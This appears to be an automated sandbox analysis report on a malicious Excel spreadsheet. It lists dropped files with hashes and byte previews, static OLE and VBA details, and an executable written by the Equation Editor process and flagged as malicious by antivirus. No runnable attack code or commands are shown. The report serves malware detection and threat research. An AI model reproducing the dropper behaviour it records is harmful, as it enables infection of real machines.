Entropy (8bit):	4.308751351247167
Encrypted:	false
SSDEEP:	3:T9RurfyWGRMWyn:TaSMWyn
MD5:	F54A2E254A72D0CC8E1EF8327CB8A7B5
SHA1:	B5635CB7A221E52073F56017FD4DBE36BAAC3228
SHA-256:	DB054403B148F267DE03752254EB25A8E981E59CA9F6E93F3E39C1E9D70405A7
SHA-512:	5A343BD2A70006CEE64831AB815DCAF1170BC7282378670236A835799DD1292B0A6D7496B863C3522F4379A94E0365DE5367F93D275A09D9A8F97A3426983382
Malicious:	false
Preview:	[coryphodont]..Antihemorrheidal=bursitis..

C:\Users\user\AppData\Local\Temp\~DF214D23ED1021E3B3.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF870C76E676519B59.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	872448
Entropy (8bit):	7.383067490138402
Encrypted:	false
SSDEEP:	24576:5WQmmav30xyZyXw6Vv9bVbDTZy3w6VW4bVaP:IQmmQ30Wv6Vv9bVlr6VW4bV
MD5:	8A694BB67C2094504C07DFCD1EEA3C85
SHA1:	F24A088C75650D46563B71122EB08BFB12B6E42A
SHA-256:	8026FFE67B81C990942D43CC16EA9F5977EB143B88C256CB81EB5B45F5B15378
SHA-512:	2FBD89361916D1D0D076D9A912415C6F58548DE73EA9B52B4CD4931147348518AAA2653ABE0F426489DEC660AD32B54F493C01E472ED0BA0BCF70F416BED2FFF
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8C8D6BC10DEDB38C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.883387298430576
Encrypted:	false
SSDEEP:	192:zIuQTAbFEBP6pIMAiuvgOI3EDg7d25yLo7u:zATNBP+buxQQ3gs
MD5:	535830F62EA1DC79B8A3E1B8A3BFA92D
SHA1:	D8AA747B92C2ABF706D9F412AE1241390C42A9F1
SHA-256:	EF29888668C5BAC940F6A0D983761656AB4BE99700C585DD34BC568DC8BB40A8
SHA-512:	DF6AF0C6B269C6CC158E870FA0FD239711732A9D3A9109A146C9470CA36174E072574BFAE0FAC9BD932B2F876E2E78584540738C3AAD95311FFDD85922162D5E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8DCB70E4BFE1EB2B.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.8416171097032406
Encrypted:	false
SSDEEP:	96:k68iQ30YWuQTqK7dAztFEB7wHSn81Suqsr0vkL9xAB/jrBzmKdDUjAPbNxBIwB7I:oIuQTXkFEBP6pIMkrlzDDgkNn5yLo
MD5:	1D8A38B56A21BD472FBAC97B063EA839
SHA1:	658605BD9C690ACFD869571C52FF68EBCB2ACD86
SHA-256:	2B8442544B91B71978BD1C1C885A5BF80CF0BDE698754D7AF42919FCAB21C655
SHA-512:	D8719A4C9924F5FF75E92F0A2AD2597505F3C880C6C525B1851491E719DBD32F50367DEFDF5FA02C52E0A28FAAC014A05DB5A6E473EB1DE5E5E1FA663F08ECE4
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB5A43CED4CCFDB42.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.6739662216458647
Encrypted:	false
SSDEEP:	12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
MD5:	C61F99FE7BEE945FC31B62121BE075CD
SHA1:	083BBD0568633FECB8984002EB4FE8FA08E17DD9
SHA-256:	1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
SHA-512:	46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
Malicious:	false
Preview:	....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.\|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	24152
Entropy (8bit):	0.7532185028349225
Encrypted:	false
SSDEEP:	48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
MD5:	520FE964934AF1AB0CEBA2366830D0FA
SHA1:	B90310ACA870261CB619FDFD1E54E1B1A25074FF
SHA-256:	DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
SHA-512:	A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
Malicious:	false
Preview:	...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$.....e...F....f.qo.]...B1{.8.%%..,...;.\|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.\|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.\|.0..$<bC.G........~];..D.\|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b\|..B.]-]jk....PQZ..T}..M.S...88......?.$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb..........g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Mon Oct 16 06:58:51 2023, atime=Mon Oct 16 06:58:54 2023, length=1424384, window=hide
Category:	dropped
Size (bytes):	1129
Entropy (8bit):	4.483720005088116
Encrypted:	false
SSDEEP:	12:87V1RgXg/XAlCPCHaX2BZB/5YXX+W3/WIAxWmftKicvb8p5SaExWmpDtZ3YilMM4:83/XTmD4XxWx/frei5Snx/pDv3qok7N
MD5:	1AD7075E8F10ADFDD3DE06909FC2AF8D
SHA1:	86B0AF632C212C10E9524FE3BC1EB9638899E758
SHA-256:	1383DD89D5BC49DAB414B483F0679A01531D831B72B8D4587B3CB1BC43458A0B
SHA-512:	786F97EAF3BDDC3A2B6722DC4C9E1F5F7EFA1F427F003AEA3464202C8F93DF12C36BFACDE8A35814710ED5D0953C36F5AECEAEDA8483CEF1642BB30C14D3136E
Malicious:	false
Preview:	L..................F.... ......r....u..........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WE...user.8......QK.X.WE....&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....PW@? .#U4E5D~1.XLS..x.......WE..WE..........................#.U.4.e.5.d.#.U.6.7.0.8.#.U.5.8.f.0.#.U.6.6.0.e._.4.0.9.8.1.6.7.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\347688\Users.user\Desktop\#U4e5d#U6708#U58f0#U660e_40981677.xls.<.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.#.U.4.e.5.d.#.U.6.7.0.8.#.U.5.8.f.0.#.U.6.6.0.e._.4.0.9.8.1.6.7.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Generic INItialization configuration [folders]
Category:	modified
Size (bytes):	34
Entropy (8bit):	4.0286393118385755
Encrypted:	false
SSDEEP:	3:zTBCm4FCv:zTV
MD5:	FCED6D2684017D184489C05D87BB12FD
SHA1:	EB0EE73F14F995909A8876BAE400E2382D469C4E
SHA-256:	429755BF8A4922B2CD81D3E3B09E0D84E955D016BFCB11E07C968F77225A7465
SHA-512:	FDFB1BE8ACBD4A6B299F8C766115BE29AC51E8A76AD001C151694001B1B9DD565317843B14B990266BB7D0822C7E291D7C53D7A1B159E107DE1968CC51B6C2FE
Malicious:	false
Preview:	[xls]...LNK=0..[folders]...LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Engroshandlerne.agr

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	data
Category:	dropped
Size (bytes):	86434
Entropy (8bit):	4.596147320376854
Encrypted:	false
SSDEEP:	1536:3bje52+ESCvPspqbrBoZDdRxR9oEOWU0HqkL:3bq1fCvPOmrc5Rz9nWm
MD5:	DCDA6C782E8D6EE806DD3E1A71575B12
SHA1:	DD5394A4443E7E1CDBA0E565D8F0095854CEB3A5
SHA-256:	088C8536AF2896DF8E6873107C4183D013D137C924BBE8C32F29A35D46874DBB
SHA-512:	5AE46A43F73EBE19DB3B4A0FA6A3EAA70875EA34F23CC0565F9872D3FD6D6E3B1A8E4E5658BDDA750D26BDEF5BBFAAD6D47F7BA5D7A27C38A70B7C6876A8BE8D
Malicious:	false
Preview:	............x.,.........yyyy.................Q.................,.............................;;;.........i....u................(((.11111.......V.3.....5...}........]]......w..........LLLL....z..............H..........._.................xxx.................ggg...................N..................................e..\|..............9.....................P.......``............... ............................ssssss...t.....8.........S..7..........,,,......................G..^.......PP.66666.???..ll.............Q....^^^.....]]].........pppppp..777...............k...''........B....................~.....M........======.......N.....u.999...nnn.........,,...........II.7.........+...........................y................uu.$...;......\\\.......*...........................................................R....OO.....P...[[....e...............................................NNNNN......................H........ee.@....................''.....L........................................1..........bb.$$

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Megapterine.buc

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 246-148, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2362119990157315670016.000000
Category:	dropped
Size (bytes):	163779
Entropy (8bit):	4.938326189697288
Encrypted:	false
SSDEEP:	3072:KNwfAuxv4zSDxRWO0kdxyjf5TWKuT56kieBNKYAqrszfq:6wffxA+tR8jV9uT5vieBNKYfgu
MD5:	0782692CFF38628B70495E562B2614A1
SHA1:	1CF24A8842C79FA929D31571AEB187673A91CF22
SHA-256:	136B62E6481EF62303BD2305C8FB497CE931521C71CB331CB92179621D558E20
SHA-512:	613F3E3CF46FE6222AD7C8562C785A23190502B4B4EEEF54CFFEB381AA1D7F71D1C307D480489046E34C6E4981594DB29E6E86382A49D8CFAB530E757DAA8B22
Malicious:	false
Preview:	. ......W...........)E..............................U...^.w....U........'....#.......18.{U.........?..........U....j....a.........-.d...7.3.[...'.h.v......D...}../....................!......t......................-.%:......H.D......./V...<.......h....z.b...R...............ju...s=Ee...j.............o......GA....(.....Z........................I.M....&8...,........,...-.......... .7.<............J5..........ix./.}&...c..D!........."..............N...........7.n].".......F..j..~...q..i..u..e.....8.......7A.....&.........Y.......D.....=...a........g...kUv.......{...Hm....................l......Y.......o............5.....G....%.......LK.............^....>........3.C......_..].O...B........W.b8.p.X.......n.%f'v...;........%....5...6........._...........&......\........r......o/Y.....\...J.Hh.......X9..-uL.......(..dB.........v.............%.......q...z..............!.....6...._..............d..........x................L.............Ui...........d..&...Q(....N..+.F............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Spongiform.For

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	data
Category:	dropped
Size (bytes):	1390858
Entropy (8bit):	5.47049513454331
Encrypted:	false
SSDEEP:	12288:4iaNjSuAdwvibD6iNM4Fe4IeLIK12pGOifrwpSO1VmTE1tjGcMMvLLIikq5wa:mN2ivuNhbI9pGOQmSO1VHacVTLI9q6a
MD5:	D4910FD9A8A5BBF2030E2D2480BAC516
SHA1:	B7CDA4C565EE6BCCB3956AFE5DC057CA9A1B5993
SHA-256:	C5EC53E76C60CE7494228BA21E135C1698B8EF82365119DF3759BEC2DFECE45C
SHA-512:	F917486869AF1F6AF4466DE5B2F62777885E5A4B4B5686DA8FD687A3F8A24975315A00AD887457D7675085DCAB9D05FBD76A4634143A8F744DD23D5808D95B50
Malicious:	false
Preview:	.........nn.."...............ttt..........ff.........[.).."........--......3....D......RR....rr.............44.....ccc.................4....//....hh..........;;;;;;;;;..UUUU.RRRRRR................}.p...................22222............$.##.......:............\.............J........N........x..................::::..yyy...........S......{...........gg..........:................11.... ...P...ddd...w........@..HH...................ccc......y.777..........AA................--....$$$$$$..^^......f.................c.........+..... .........................[[[..........,,.........ww.......SS......bbbb.....................zzz......+..H.....k..........%%%......\\.0......$$$$............y......hh............==..............b..rr..G.........................b....................)).2........TT................&&&&...........2222.__.............^^............a.........q...............X.....gg.........@........................qq.....}..........o....5..............))................g...............tt...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\haves.ant

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	data
Category:	dropped
Size (bytes):	144737
Entropy (8bit):	4.9429482615607165
Encrypted:	false
SSDEEP:	3072:5w8VNxOulgKUnkFg3sgS2fm0ieW5zym0HVCmV:5woLlgKUnkFHgSURz4zIrV
MD5:	F84B9E2BDA2302BC917050F4F1B5C907
SHA1:	8258DE54AEC259536F36285708D66E494D247905
SHA-256:	8B4250121C2470B3E1458EE51E6DB638C7DAE2A188F24D9141849D267B65D36B
SHA-512:	1AFD54A056CBB8D7D87DBAB318F46D77706C4F05735E52DE3301FD2A78EB36637CF534E2CED8638689C1904828829A11E1974D4679E1D297068E293DF6D55CA2
Malicious:	false
Preview:	.2.r.A................b...F...S.v..]....Z......n?.................k.........R.({.E;......U........2.........<.1..............F.(...........p.3..............Z.............\|.............Q..P.Zw...JZ.......:.....)A....[RV...H............O.................B.....5..)....~..k.....\|.1....d......6@...+.....j......"g.y.-?..........DB.\......'K...M..........I.....Q.........S.....B.........2.3.N.....E....C......b....K.6................$...Z.^.{.........[Y........ ...6,..&..P....f}.L.....q.....1..".\.....j.......fT...B.F.................8.........e...q.............6.\|.....F.._"...?..........1O..&.K..t...<n:..................=...DO,..c.L.....N+...3..!.....J..Hg;.}.}........2.4.,......."4.C.........n............c.O....2.E.....lr`.:..ea........qC...Q....h.....r..........Z...............q}t."..M.......!V..b.........C..9....J..v......+...........=...v&...............K..[..D.........{..L....u........5.....................:.....7.e..}.P.....`.^..M...p..M..<4.......n......4....'........(L..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\laggin.tel

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	data
Category:	dropped
Size (bytes):	243403
Entropy (8bit):	4.95927012728034
Encrypted:	false
SSDEEP:	6144:ZATFfjMU61iyzkn+upJwQIkCqLWZNPzlmAZOibfQJGnbOKVy:sfjr61RO+uwQ5ENPzmib4Yy
MD5:	894C5CFD443EABAA15BE7A7CCEA4E9F5
SHA1:	C25D071C1BBDB7813B5A9EB8E7D04FFACB063389
SHA-256:	3CE9F1F2DC922EB0ED91C0ED1264D17506B7B4EF065E49555F77A96317A3CCD5
SHA-512:	FCD61116FAA5CCFB004CCAAFDA68AA42BAB7CF3AF8B0D0AD6AF67A0132434806765A1EBB4C36F12ED69745D1A3BE1F4A4C5AADCA15FECED53D37C004104CCAD0
Malicious:	false
Preview:	-............Y...........".............-......A:...h............#.......[...\."...................?.D..a...?.............~."....)....R.........M....P...].b;....a.u.Ia..z.....n.t....S....[........).W.......l..e................M+......\...........%...$..%..n..............-............+F...!..n.......y..................C[..]...f....s.....(................q.l...'...........l...m.7.5...t....kcZ..Q....(.x....zn..........B..W....G..........a.....:*............1.q...v. ......\L.1..2./Q....5.........5.k..w.....!....P......K..+...[......y.2............#....@.p...2..D.7. c..&..................#.......7.'..............T.(E...!...............I........]............g...>.r.U...4........<....................B....1....\|........O.R.........3[.v....+....a).....@....!.F...;...u. .....^....q_.V\|BJ..w`........jM........F.....A../..$....0.d..5N..g..v.................-p............E....YU.....+....\|....%..........S....5..>.G...........y....E..i.)....V.......................h...(Q[-G.:.........]........Y

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\regneoperatorers.txt

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.292190557993067
Encrypted:	false
SSDEEP:	12:U6cKWn1izXeejCThRvO4IQJWc05kC257zNC1NFLyx:U3KW1SeeYzvlIQJd0qC25MByx
MD5:	1693541DFB1E3B101649889AAE97DC5B
SHA1:	E9F89EE2A9F46ABB9738625B97600EE3B56B705D
SHA-256:	A4943074FBBB15A41254082AB6FEA90FE5D302F6E6969E963F6B04A92B49F739
SHA-512:	B72C8DB040CDA851C4D68110DB1E6CCBA2D90DF93AE829E03436F17223693014FBF2F68D4AC713FA0CF2A74055424250F5DB8C285CC8A767BF7C894788724EA7
Malicious:	false
Preview:	udviklingscenter tiljubler kurrende kaper politicalized vandindvindingsanlgget neuroleptanalgesia havergrass postique flise baptizer sprjtenarkomanen..imino udklippende forpakning unalterably.daedalean skeers fogyishness parathyroidectomised udlign autocrat maskinparkens teknokratiseret..rutebaadenes unpreventable bogkrybbens sknhedspletternes overstegnes slugtens dekorum,urbane serest selektionernes,liquify adfrdsmnstres polybranchian neall brandtale.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers\unintriguing.tie

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	data
Category:	modified
Size (bytes):	5935
Entropy (8bit):	4.893001480959504
Encrypted:	false
SSDEEP:	96:wCHb7caV5pcvPQzcsG4LMvyER8TY8Vvj3B442oBIBr7qTRRtSubJuf+F5LzllGEt:dPcaV3cnQzc4LZECYQt2jqT1bJuWjLzR
MD5:	064C026C4CAA1483900E7AC2C0DFFF1C
SHA1:	EAAF94292A01CF711B27321265A929E4C8F2A9DF
SHA-256:	B3E57DBE2DE42502F0C3D005F8347C1B2B72B6A29EC80474921C6A274FF2E081
SHA-512:	15B03A3DBB34CDB0AFA733FEF6761A4955A4891015F1A6E43EDFC86EB05790AA4C6929D8374A47AADDE4C911BB7F100E329C866E68959887DB9897761627300D
Malicious:	false
Preview:	.g.....k....q.......DL..+.n....S.*...V.. .+..U.........<..X....e.".....6.....g...........f....49.......dE.h.......X...[....M.....M.....y.........T..w`E....5l.z..............c,..y..o....................QE...............r......)....../.........;..g....c.A.rf.k.....[..Z...i............M......[.............V\|..F...........1.(....).z.@....I......J....W............A................[..4.....B,..B.k......g...C..3...t.....{....5.9._F.........T........Q.....e............C.... ........E{.....k....(.x..l..............A....,w........@........9.`....Z..........a3...$W....#..Bd.....c..........e...............r......~......jl..................hj..... .....l.'m.4............._..<.Q.f...>6.......e...M..........'.......&.....n....."\.....F.....O.....A...........................I._.........i...<.d."......m................o...U....y;........+........o.O...> ........$..o......v............./......................................z...7w8g...2.........:....a~...........Is.....N.$....a.............Y...

C:\Users\user\AppData\Roaming\audiodgse.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1272864
Entropy (8bit):	7.983367304390116
Encrypted:	false
SSDEEP:	24576:ZQ3IGHgEKN05uKEPfbze1J9c8ae1D1FkTaO/bwntZKo4PCnsoO+Lt:ZQ3IbGEf+X9Xtk2O/bw7KpCnsa5
MD5:	6E8215EEE3034D6DCF18D79D397E5715
SHA1:	5612BFF0830A9A025EB35CF7C054D2062745D1B9
SHA-256:	AC4761C259DAEDE4B4EFB78816C98FB56344E381BB56D69EA897C30C9899BF39
SHA-512:	5B5A08E02C7F58F25A436508848F90D397C2545B474F37202CEF5F8BA9D4924761E500A2D54E082F51EABD80B2CC33D21D73B45206D79E64C7BB0CE21ABF83C1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 32% Antivirus: Virustotal, Detection: 32%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L......].................`..........52.......p....@.......................................@.................................0t.......................T...............................................................p...............................text...}_.......`.................. ..`.rdata..>....p.......d..............@..@.data................x..............@....ndata...`...@...........................rsrc................\|..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\4B430000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 16 08:58:53 2023, Security: 0
Category:	dropped
Size (bytes):	1424384
Entropy (8bit):	7.841255073938591
Encrypted:	false
SSDEEP:	24576:+WQmmav30x3Zyvw6Vr9bV1DWZylw6VK4bV1P9qfa4HBA8b7DJHj/xOroKK3t2fon:zQmmQ30jr6Vr9bVWh6VK4bVKRA8bXJLT
MD5:	5E6148DC18712F3B090652691D016616
SHA1:	D5488DED267AD18F555AA81F5745E4C708A66BB6
SHA-256:	9F490B1971564541CF4A4E0FEDAD05798BF719B5449B7CF2A59A97CF5F6CB343
SHA-512:	24BD24571A2F510E25475A848AE3D1438E71685A18B19E865C99F2A6AAA62B671EB28C1DF1E567C53D5CDF1AF5A312CF2BE4191122596A3892EA1CF75D6CA536
Malicious:	false
Preview:	......................>.......................................................0...1...H...I...?.......................$.......b.......d.......f.......h.......j.............................................................................................................................................................................................................................................................................................................................................................................../.......G................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...........F...........3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\4B430000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Oct 15 16:35:19 2023, Security: 0
Entropy (8bit):	7.762599010466731
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	#U4e5d#U6708#U58f0#U660e_40981677.xls
File size:	1'282'048 bytes
MD5:	c1a75affe1c99a629a5fb4b3df7359e9
SHA1:	86e4a29c68354c25cda769698fdd189e9f2f14b1
SHA256:	649e9cc1261032e6098f6469b87a16e4342c159b29725af71afeb71183513aad
SHA512:	ba43428de8522fc326a36b7cd0d737263564aaf2cc5020e150be72ce1fa1888da7ca9265c5190172f8f8b268b6a89aaba7ddb0969c9aee92eed7387f1048f715
SSDEEP:	24576:bWQmmav30xrZyuw6V33bVSkmZypw6VW3bVz4i4fp5g2QcXQ5ZdAI9SvSw4x:6QmmQ30DK6V33bVQd6VW3bVWU2rXcAIR
TLSH:	4455E003E840CA83D40D83F97E633EE91B1EBF15E9D16ACB11567F4B3A706A2095B51E
File Content Preview:	........................>.......................................................0...1...H...I...?.......................".......~...............b.......d......................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "#U4e5d#U6708#U58f0#U660e_40981677.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2023-10-15 15:35:19
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	MBD0010AD51/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w t . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
